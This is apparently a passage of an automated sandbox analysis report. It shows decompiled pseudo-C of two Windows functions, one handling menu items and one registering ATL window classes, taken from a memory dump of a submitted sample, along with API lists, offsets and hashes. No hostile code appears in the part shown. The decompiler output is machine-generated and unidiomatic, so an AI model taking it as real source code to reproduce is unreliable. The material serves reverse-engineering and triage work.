                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t119 + 0x18)) =  *((intOrPtr*)(_t119 + 0x18)) - 1;
                                                                                                                                                                                                                                                                                          						_t100 = 0;
                                                                                                                                                                                                                                                                                          						__eflags = _t127;
                                                                                                                                                                                                                                                                                          						if(_t127 == 0) {
                                                                                                                                                                                                                                                                                          							goto L8;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_v8 = 0;
                                                                                                                                                                                                                                                                                          							_t68 = GetMenuItemCount(_t127);
                                                                                                                                                                                                                                                                                          							__eflags = _t68;
                                                                                                                                                                                                                                                                                          							if(_t68 <= 0) {
                                                                                                                                                                                                                                                                                          								L29:
                                                                                                                                                                                                                                                                                          								_v8 = 0xffffffff;
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								goto L19;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							do {
                                                                                                                                                                                                                                                                                          								L19:
                                                                                                                                                                                                                                                                                          								E00106820( &_v236, 0, 0x30);
                                                                                                                                                                                                                                                                                          								_v236.cbSize = 0x30;
                                                                                                                                                                                                                                                                                          								E00106820( &(_v176.dwMajorVersion), 0, 0x90);
                                                                                                                                                                                                                                                                                          								_t132 = _t132 + 0x18;
                                                                                                                                                                                                                                                                                          								_v176.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                                                                          								_t72 = GetVersionExA( &_v176);
                                                                                                                                                                                                                                                                                          								__eflags = _t72;
                                                                                                                                                                                                                                                                                          								if(_t72 == 0) {
                                                                                                                                                                                                                                                                                          									L23:
                                                                                                                                                                                                                                                                                          									_v236.cbSize = 0x2c;
                                                                                                                                                                                                                                                                                          									goto L24;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t81 = _v176.dwMajorVersion;
                                                                                                                                                                                                                                                                                          								__eflags = _t81 - 5;
                                                                                                                                                                                                                                                                                          								if(_t81 >= 5) {
                                                                                                                                                                                                                                                                                          									goto L24;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								__eflags = _t81 - 4;
                                                                                                                                                                                                                                                                                          								if(_t81 != 4) {
                                                                                                                                                                                                                                                                                          									goto L23;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								__eflags = _v176.dwMinorVersion - 0x5a;
                                                                                                                                                                                                                                                                                          								if(_v176.dwMinorVersion >= 0x5a) {
                                                                                                                                                                                                                                                                                          									goto L24;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L23;
                                                                                                                                                                                                                                                                                          								L24:
                                                                                                                                                                                                                                                                                          								_t114 =  &_v236;
                                                                                                                                                                                                                                                                                          								_v236.fMask = 0x30;
                                                                                                                                                                                                                                                                                          								GetMenuItemInfoA(_t127, _t100, 1,  &_v236);
                                                                                                                                                                                                                                                                                          								_t74 = _v236.dwItemData;
                                                                                                                                                                                                                                                                                          								_t122 = _t74;
                                                                                                                                                                                                                                                                                          								__eflags = _t74;
                                                                                                                                                                                                                                                                                          								if(_t74 != 0) {
                                                                                                                                                                                                                                                                                          									__eflags = _t74->i - 0x1313;
                                                                                                                                                                                                                                                                                          									if(_t74->i == 0x1313) {
                                                                                                                                                                                                                                                                                          										_v236.fMask = 0x31;
                                                                                                                                                                                                                                                                                          										_t128 = _t74 + 4;
                                                                                                                                                                                                                                                                                          										_v236.fType =  *((intOrPtr*)(_t74 + 8));
                                                                                                                                                                                                                                                                                          										_v236.dwTypeData =  *_t128;
                                                                                                                                                                                                                                                                                          										_t77 = lstrlenA( *_t128);
                                                                                                                                                                                                                                                                                          										_t114 = _v184;
                                                                                                                                                                                                                                                                                          										_v236.cch = _t77;
                                                                                                                                                                                                                                                                                          										_v236.dwItemData = 0;
                                                                                                                                                                                                                                                                                          										SetMenuItemInfoA(_v184, _t100, 1,  &_v236);
                                                                                                                                                                                                                                                                                          										_push( *_t128);
                                                                                                                                                                                                                                                                                          										E001062C2();
                                                                                                                                                                                                                                                                                          										_push(_t122);
                                                                                                                                                                                                                                                                                          										_t122->i = 0x6666;
                                                                                                                                                                                                                                                                                          										E001059DB();
                                                                                                                                                                                                                                                                                          										_t127 = _v184;
                                                                                                                                                                                                                                                                                          										_t132 = _t132 + 8;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t100 = _t100 + 1;
                                                                                                                                                                                                                                                                                          								_t75 = GetMenuItemCount(_t127);
                                                                                                                                                                                                                                                                                          								__eflags = _t100 - _t75;
                                                                                                                                                                                                                                                                                          							} while (_t100 < _t75);
                                                                                                                                                                                                                                                                                          							_t119 = _v188;
                                                                                                                                                                                                                                                                                          							goto L29;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L8;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if(__ecx == 0 || __ecx ==  *((intOrPtr*)(_t119 + 0x44))) {
                                                                                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                                                                                          					_t86 = 0;
                                                                                                                                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                                                                                                                                          					goto L6;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t114 = __edx >> 0x10;
                                                                                                                                                                                                                                                                                          					if((__edx >> 0x00000010 & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t86 = 1;
                                                                                                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                                                                                                          						 *(_t119 + 0x84) = (_t86 + _t86 + _t86 + _t86 + _t86 + _t86 + _t86 + _t86 ^ _t102) & 0x00000008 ^ _t102;
                                                                                                                                                                                                                                                                                          						if(IsWindow( *(_t119 + 0x5c)) != 0) {
                                                                                                                                                                                                                                                                                          							_t114 =  *(_t119 + 0x5c);
                                                                                                                                                                                                                                                                                          							SendMessageA( *(_t119 + 0x5c), _a8, _t124, _t97);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L8;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}







































                                                                                                                                                                                                                                                                                          0x000fe5f0
                                                                                                                                                                                                                                                                                          0x000fe5f3
                                                                                                                                                                                                                                                                                          0x000fe5f5
                                                                                                                                                                                                                                                                                          0x000fe600
                                                                                                                                                                                                                                                                                          0x000fe601
                                                                                                                                                                                                                                                                                          0x000fe607
                                                                                                                                                                                                                                                                                          0x000fe60c
                                                                                                                                                                                                                                                                                          0x000fe60e
                                                                                                                                                                                                                                                                                          0x000fe614
                                                                                                                                                                                                                                                                                          0x000fe618
                                                                                                                                                                                                                                                                                          0x000fe61e
                                                                                                                                                                                                                                                                                          0x000fe620
                                                                                                                                                                                                                                                                                          0x000fe622
                                                                                                                                                                                                                                                                                          0x000fe625
                                                                                                                                                                                                                                                                                          0x000fe62e
                                                                                                                                                                                                                                                                                          0x000fe634
                                                                                                                                                                                                                                                                                          0x000fe63d
                                                                                                                                                                                                                                                                                          0x000fe6b8
                                                                                                                                                                                                                                                                                          0x000fe6be
                                                                                                                                                                                                                                                                                          0x000fe686
                                                                                                                                                                                                                                                                                          0x000fe68c
                                                                                                                                                                                                                                                                                          0x000fe69a
                                                                                                                                                                                                                                                                                          0x000fe6a2
                                                                                                                                                                                                                                                                                          0x000fe6a3
                                                                                                                                                                                                                                                                                          0x000fe6a4
                                                                                                                                                                                                                                                                                          0x000fe6b2
                                                                                                                                                                                                                                                                                          0x000fe6b2
                                                                                                                                                                                                                                                                                          0x000fe6c0
                                                                                                                                                                                                                                                                                          0x000fe6c2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe6c4
                                                                                                                                                                                                                                                                                          0x000fe6c7
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe6d0
                                                                                                                                                                                                                                                                                          0x000fe6d0
                                                                                                                                                                                                                                                                                          0x000fe6d3
                                                                                                                                                                                                                                                                                          0x000fe6d3
                                                                                                                                                                                                                                                                                          0x000fe6d6
                                                                                                                                                                                                                                                                                          0x000fe6d8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe6da
                                                                                                                                                                                                                                                                                          0x000fe6dd
                                                                                                                                                                                                                                                                                          0x000fe6e0
                                                                                                                                                                                                                                                                                          0x000fe6e3
                                                                                                                                                                                                                                                                                          0x000fe6e9
                                                                                                                                                                                                                                                                                          0x000fe6eb
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe6ed
                                                                                                                                                                                                                                                                                          0x000fe6f0
                                                                                                                                                                                                                                                                                          0x000fe6f2
                                                                                                                                                                                                                                                                                          0x000fe6f8
                                                                                                                                                                                                                                                                                          0x000fe6f8
                                                                                                                                                                                                                                                                                          0x000fe6fa
                                                                                                                                                                                                                                                                                          0x000fe704
                                                                                                                                                                                                                                                                                          0x000fe709
                                                                                                                                                                                                                                                                                          0x000fe709
                                                                                                                                                                                                                                                                                          0x000fe70c
                                                                                                                                                                                                                                                                                          0x000fe70f
                                                                                                                                                                                                                                                                                          0x000fe711
                                                                                                                                                                                                                                                                                          0x000fe713
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe719
                                                                                                                                                                                                                                                                                          0x000fe71a
                                                                                                                                                                                                                                                                                          0x000fe71d
                                                                                                                                                                                                                                                                                          0x000fe723
                                                                                                                                                                                                                                                                                          0x000fe725
                                                                                                                                                                                                                                                                                          0x000fe845
                                                                                                                                                                                                                                                                                          0x000fe845
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe72b
                                                                                                                                                                                                                                                                                          0x000fe72b
                                                                                                                                                                                                                                                                                          0x000fe73a
                                                                                                                                                                                                                                                                                          0x000fe74d
                                                                                                                                                                                                                                                                                          0x000fe753
                                                                                                                                                                                                                                                                                          0x000fe758
                                                                                                                                                                                                                                                                                          0x000fe762
                                                                                                                                                                                                                                                                                          0x000fe76c
                                                                                                                                                                                                                                                                                          0x000fe772
                                                                                                                                                                                                                                                                                          0x000fe774
                                                                                                                                                                                                                                                                                          0x000fe78f
                                                                                                                                                                                                                                                                                          0x000fe78f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe78f
                                                                                                                                                                                                                                                                                          0x000fe776
                                                                                                                                                                                                                                                                                          0x000fe77c
                                                                                                                                                                                                                                                                                          0x000fe77f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe781
                                                                                                                                                                                                                                                                                          0x000fe784
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe786
                                                                                                                                                                                                                                                                                          0x000fe78d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe799
                                                                                                                                                                                                                                                                                          0x000fe799
                                                                                                                                                                                                                                                                                          0x000fe7a4
                                                                                                                                                                                                                                                                                          0x000fe7aa
                                                                                                                                                                                                                                                                                          0x000fe7b0
                                                                                                                                                                                                                                                                                          0x000fe7b6
                                                                                                                                                                                                                                                                                          0x000fe7b8
                                                                                                                                                                                                                                                                                          0x000fe7ba
                                                                                                                                                                                                                                                                                          0x000fe7bc
                                                                                                                                                                                                                                                                                          0x000fe7c2
                                                                                                                                                                                                                                                                                          0x000fe7c4
                                                                                                                                                                                                                                                                                          0x000fe7d1
                                                                                                                                                                                                                                                                                          0x000fe7d4
                                                                                                                                                                                                                                                                                          0x000fe7dc
                                                                                                                                                                                                                                                                                          0x000fe7e5
                                                                                                                                                                                                                                                                                          0x000fe7eb
                                                                                                                                                                                                                                                                                          0x000fe7fc
                                                                                                                                                                                                                                                                                          0x000fe802
                                                                                                                                                                                                                                                                                          0x000fe80c
                                                                                                                                                                                                                                                                                          0x000fe814
                                                                                                                                                                                                                                                                                          0x000fe815
                                                                                                                                                                                                                                                                                          0x000fe81a
                                                                                                                                                                                                                                                                                          0x000fe81b
                                                                                                                                                                                                                                                                                          0x000fe821
                                                                                                                                                                                                                                                                                          0x000fe826
                                                                                                                                                                                                                                                                                          0x000fe82c
                                                                                                                                                                                                                                                                                          0x000fe82c
                                                                                                                                                                                                                                                                                          0x000fe7c2
                                                                                                                                                                                                                                                                                          0x000fe830
                                                                                                                                                                                                                                                                                          0x000fe831
                                                                                                                                                                                                                                                                                          0x000fe837
                                                                                                                                                                                                                                                                                          0x000fe837
                                                                                                                                                                                                                                                                                          0x000fe83f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe83f
                                                                                                                                                                                                                                                                                          0x000fe713
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe6d0
                                                                                                                                                                                                                                                                                          0x000fe641
                                                                                                                                                                                                                                                                                          0x000fe654
                                                                                                                                                                                                                                                                                          0x000fe654
                                                                                                                                                                                                                                                                                          0x000fe654
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe648
                                                                                                                                                                                                                                                                                          0x000fe648
                                                                                                                                                                                                                                                                                          0x000fe64e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe650
                                                                                                                                                                                                                                                                                          0x000fe650
                                                                                                                                                                                                                                                                                          0x000fe656
                                                                                                                                                                                                                                                                                          0x000fe662
                                                                                                                                                                                                                                                                                          0x000fe674
                                                                                                                                                                                                                                                                                          0x000fe679
                                                                                                                                                                                                                                                                                          0x000fe680
                                                                                                                                                                                                                                                                                          0x000fe680
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe674
                                                                                                                                                                                                                                                                                          0x000fe64e

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 000FE66C
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,?,?,?), ref: 000FE680
                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32 ref: 000FE71D
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000FE73A
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000FE753
                                                                                                                                                                                                                                                                                          • GetVersionExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 000FE76C
                                                                                                                                                                                                                                                                                          • GetMenuItemInfoA.USER32 ref: 000FE7AA
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 000FE7E5
                                                                                                                                                                                                                                                                                          • SetMenuItemInfoA.USER32(?,00000000,00000001,0000002C), ref: 000FE80C
                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32 ref: 000FE831
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ItemMenu$CountInfo_memset$MessageSendVersionWindowlstrlen
                                                                                                                                                                                                                                                                                          • String ID: ,$1$Z
                                                                                                                                                                                                                                                                                          • API String ID: 1539385232-2998721434
                                                                                                                                                                                                                                                                                          • Opcode ID: 8a164f3c3661c2847449c45f1a98640a6bd616defe655edd6cd7a47e7ce51ac8
                                                                                                                                                                                                                                                                                          • Instruction ID: 177ca835cb94f1ae14aa2e8741ddb03f2f0adb27afb680cd9c8a21e0ce399481
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a164f3c3661c2847449c45f1a98640a6bd616defe655edd6cd7a47e7ce51ac8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C61AC71A00359AFDB24DF14CC84BEEB7B9FF14350F1081A9EA09A7691D770AE85CB91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                                                                                                                          			E000F4F00(WNDCLASSEXA* __ebx, intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                          				CHAR* _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _v20;
                                                                                                                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                                                                                                                          				void _v68;
                                                                                                                                                                                                                                                                                          				void _v116;
                                                                                                                                                                                                                                                                                          				int _t54;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t63;
                                                                                                                                                                                                                                                                                          				WNDCLASSEXA* _t68;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t90;
                                                                                                                                                                                                                                                                                          				CHAR* _t97;
                                                                                                                                                                                                                                                                                          				CHAR* _t100;
                                                                                                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                                                                                                          				void* _t105;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t68 = __ebx;
                                                                                                                                                                                                                                                                                          				if( *((short*)(__ebx + 0x40)) != 0) {
                                                                                                                                                                                                                                                                                          					L15:
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t68 + 0x30)) != 0) {
                                                                                                                                                                                                                                                                                          						 *_a4 =  *((intOrPtr*)(_t68 + 0x34));
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return  *(_t68 + 0x40);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					EnterCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          					if( *((short*)(__ebx + 0x40)) != 0) {
                                                                                                                                                                                                                                                                                          						L14:
                                                                                                                                                                                                                                                                                          						LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          						goto L15;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t97 =  *(__ebx + 0x30);
                                                                                                                                                                                                                                                                                          						_t90 =  *0x170c08;
                                                                                                                                                                                                                                                                                          						_v20 = _t90;
                                                                                                                                                                                                                                                                                          						if(_t97 == 0) {
                                                                                                                                                                                                                                                                                          							asm("sbb ecx, ecx");
                                                                                                                                                                                                                                                                                          							__ebx->hCursor = LoadCursorA( !( ~( *(__ebx + 0x3c))) & _t90,  *(__ebx + 0x38));
                                                                                                                                                                                                                                                                                          							goto L8;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_v12 = __ebx->lpszClassName;
                                                                                                                                                                                                                                                                                          							_v16 =  *((intOrPtr*)(__ebx + 8));
                                                                                                                                                                                                                                                                                          							E00106820( &_v64, 0, 0x2c);
                                                                                                                                                                                                                                                                                          							_t105 = _t103 + 0xc;
                                                                                                                                                                                                                                                                                          							_v68 = 0x30;
                                                                                                                                                                                                                                                                                          							_t63 = GetClassInfoExA(_t90, _t97,  &_v68);
                                                                                                                                                                                                                                                                                          							if(_t63 != 0 || GetClassInfoExA(_t63,  *(__ebx + 0x30),  &_v68) != 0) {
                                                                                                                                                                                                                                                                                          								memcpy(_t68,  &_v68, 0xc << 2);
                                                                                                                                                                                                                                                                                          								_t103 = _t105 + 0xc;
                                                                                                                                                                                                                                                                                          								_t90 = _v20;
                                                                                                                                                                                                                                                                                          								 *((intOrPtr*)(_t68 + 0x34)) =  *((intOrPtr*)(_t68 + 8));
                                                                                                                                                                                                                                                                                          								_t68->lpszClassName = _v12;
                                                                                                                                                                                                                                                                                          								 *((intOrPtr*)(_t68 + 8)) = _v16;
                                                                                                                                                                                                                                                                                          								L8:
                                                                                                                                                                                                                                                                                          								_t68->style = _t68->style & 0xffffbfff;
                                                                                                                                                                                                                                                                                          								_t68->hInstance = _t90;
                                                                                                                                                                                                                                                                                          								if(_t68->lpszClassName == 0) {
                                                                                                                                                                                                                                                                                          									_t100 = _t68 + 0x42;
                                                                                                                                                                                                                                                                                          									E000F4980(_t100, "ATL:%p", _t68);
                                                                                                                                                                                                                                                                                          									_t103 = _t103 + 8;
                                                                                                                                                                                                                                                                                          									_t68->lpszClassName = _t100;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t54 = GetClassInfoExA(_t68->hInstance, memcpy( &_v116, _t68, 0xc << 2),  &_v116);
                                                                                                                                                                                                                                                                                          								 *(_t68 + 0x40) = _t54;
                                                                                                                                                                                                                                                                                          								if(_t54 == 0) {
                                                                                                                                                                                                                                                                                          									if( *(_t68 + 0x50) != 0) {
                                                                                                                                                                                                                                                                                          										_t68->hIcon = LoadImageA( *0x170c0c,  *(_t68 + 0x50) & 0x0000ffff, 1, 0x20, 0x20, 0);
                                                                                                                                                                                                                                                                                          										_t68->hIconSm = LoadImageA( *0x170c0c,  *(_t68 + 0x50) & 0x0000ffff, 1, 0x10, 0x10, 0);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									 *(_t68 + 0x40) = RegisterClassExA(_t68);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L14;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          								return 0;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                                          0x000f4f00
                                                                                                                                                                                                                                                                                          0x000f4f0d
                                                                                                                                                                                                                                                                                          0x000f506e
                                                                                                                                                                                                                                                                                          0x000f5072
                                                                                                                                                                                                                                                                                          0x000f507a
                                                                                                                                                                                                                                                                                          0x000f507a
                                                                                                                                                                                                                                                                                          0x000f5085
                                                                                                                                                                                                                                                                                          0x000f4f13
                                                                                                                                                                                                                                                                                          0x000f4f18
                                                                                                                                                                                                                                                                                          0x000f4f23
                                                                                                                                                                                                                                                                                          0x000f5063
                                                                                                                                                                                                                                                                                          0x000f5068
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f4f29
                                                                                                                                                                                                                                                                                          0x000f4f29
                                                                                                                                                                                                                                                                                          0x000f4f2c
                                                                                                                                                                                                                                                                                          0x000f4f32
                                                                                                                                                                                                                                                                                          0x000f4f37
                                                                                                                                                                                                                                                                                          0x000f4fbd
                                                                                                                                                                                                                                                                                          0x000f4fcb
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f4f39
                                                                                                                                                                                                                                                                                          0x000f4f47
                                                                                                                                                                                                                                                                                          0x000f4f4a
                                                                                                                                                                                                                                                                                          0x000f4f4d
                                                                                                                                                                                                                                                                                          0x000f4f52
                                                                                                                                                                                                                                                                                          0x000f4f61
                                                                                                                                                                                                                                                                                          0x000f4f68
                                                                                                                                                                                                                                                                                          0x000f4f6c
                                                                                                                                                                                                                                                                                          0x000f4f9f
                                                                                                                                                                                                                                                                                          0x000f4f9f
                                                                                                                                                                                                                                                                                          0x000f4fa7
                                                                                                                                                                                                                                                                                          0x000f4faa
                                                                                                                                                                                                                                                                                          0x000f4fad
                                                                                                                                                                                                                                                                                          0x000f4fb0
                                                                                                                                                                                                                                                                                          0x000f4fce
                                                                                                                                                                                                                                                                                          0x000f4fce
                                                                                                                                                                                                                                                                                          0x000f4fd9
                                                                                                                                                                                                                                                                                          0x000f4fdc
                                                                                                                                                                                                                                                                                          0x000f4fde
                                                                                                                                                                                                                                                                                          0x000f4fe9
                                                                                                                                                                                                                                                                                          0x000f4fee
                                                                                                                                                                                                                                                                                          0x000f4ff1
                                                                                                                                                                                                                                                                                          0x000f4ff1
                                                                                                                                                                                                                                                                                          0x000f500c
                                                                                                                                                                                                                                                                                          0x000f5012
                                                                                                                                                                                                                                                                                          0x000f5019
                                                                                                                                                                                                                                                                                          0x000f501f
                                                                                                                                                                                                                                                                                          0x000f5048
                                                                                                                                                                                                                                                                                          0x000f5055
                                                                                                                                                                                                                                                                                          0x000f5055
                                                                                                                                                                                                                                                                                          0x000f505f
                                                                                                                                                                                                                                                                                          0x000f505f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f4f7d
                                                                                                                                                                                                                                                                                          0x000f4f82
                                                                                                                                                                                                                                                                                          0x000f4f8f
                                                                                                                                                                                                                                                                                          0x000f4f8f
                                                                                                                                                                                                                                                                                          0x000f4f6c
                                                                                                                                                                                                                                                                                          0x000f4f37
                                                                                                                                                                                                                                                                                          0x000f4f23

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00170C68), ref: 000F4F18
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000F4F4D
                                                                                                                                                                                                                                                                                          • GetClassInfoExA.USER32(000F0000,?,00000000), ref: 000F4F68
                                                                                                                                                                                                                                                                                          • GetClassInfoExA.USER32(00000000,?,00000030), ref: 000F4F77
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00170C68), ref: 000F4F82
                                                                                                                                                                                                                                                                                          • LoadCursorA.USER32 ref: 000F4FC5
                                                                                                                                                                                                                                                                                          • GetClassInfoExA.USER32(?,00000000,?), ref: 000F500C
                                                                                                                                                                                                                                                                                          • LoadImageA.USER32 ref: 000F503A
                                                                                                                                                                                                                                                                                          • LoadImageA.USER32 ref: 000F5053
                                                                                                                                                                                                                                                                                          • RegisterClassExA.USER32 ref: 000F5059
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00170C68), ref: 000F5068
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Class$CriticalInfoLoadSection$ImageLeave$CursorEnterRegister_memset
                                                                                                                                                                                                                                                                                          • String ID: 0$ATL:%p
                                                                                                                                                                                                                                                                                          • API String ID: 4152736066-2453800769
                                                                                                                                                                                                                                                                                          • Opcode ID: d81ed8a8deec5d80809c924b94113919c9e26edd99e23e1aec15569c4d028cfe
                                                                                                                                                                                                                                                                                          • Instruction ID: 6049002096093e35253e6bde6f19616a2c13097863bc760b1a96b78487948394
